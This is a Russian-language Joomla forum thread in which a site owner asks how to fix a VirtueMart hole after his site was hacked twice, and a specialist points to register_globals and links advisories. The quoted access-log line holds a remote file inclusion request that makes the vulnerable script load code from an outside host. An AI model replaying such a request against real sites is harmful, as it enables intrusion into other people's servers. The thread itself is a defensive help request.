Взломан сайт, имхо через show_image_in_imgtag.php . Что делать?

Тема в разделе "Вопросы безопасности", создана пользователем brainmen1, 17.04.2009.

  1. Offline

    brainmen1 Недавно здесь

    Регистрация:
    16.04.2009
    Сообщения:
    3
    Симпатии:
    0
    Доброго времени суток.
    В джумле разбираюсь плохо, поэтому прошу помощи.


    Ситуация:

    Хостер сообщил, что наш сайт взломан. В логах был обнаружен следующий элемент:

    64.118.90.253 - - [16/Apr/2009:07:33:59 +0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://corystore.com//components/b1ttletX.txt???
    HTTP/1.0" 200 724 "-" "Mozilla/5.0

    Ломают во второй раз. Первый раз 4 дня назад. Я установил обновления джумлы, но это, как видите, не помогло. Папка администратор паролем защищена и по факам я сделал практически все. Но хостер говорит, что это не поможет.

    Что делать? Хостер требует для включения сайта устранить уязвимость. Каким образом ее устранить?
     
  2.  
  3. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Globals в каком положении на хостинге?
    SEF есть?
     
  4. Offline

    brainmen1 Недавно здесь

    Регистрация:
    16.04.2009
    Сообщения:
    3
    Симпатии:
    0
    SEF не включали. Но если надо, можем включить.
    Globals в каком положении на хостинге? - не совсем понимаю, что ты имеешь ввиду.. из факов я вычитал, что php_value register_globals 0 - могу поставить, но хостер считает, что проблемы не решит.
     
  5. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Для начала..
    http://ru-mambo.ru/content/view/1110/124/
    Сама методика изветсна еще минимум с 2006 года кстати
    и вот - http://ru-mambo.ru/smf/index.php?PH...136d7eeeb781ec6&topic=17157.msg49044#msg49044

    Так что мое подозрение на Register Globals оправдалось

    З.Ы +поставьте sef от греха подальше
     
    Последнее редактирование: 17.04.2009
  6. Offline

    brainmen1 Недавно здесь

    Регистрация:
    16.04.2009
    Сообщения:
    3
    Симпатии:
    0
    спасибо огромное. сейчас прочту
     

Поделиться этой страницей

Загрузка...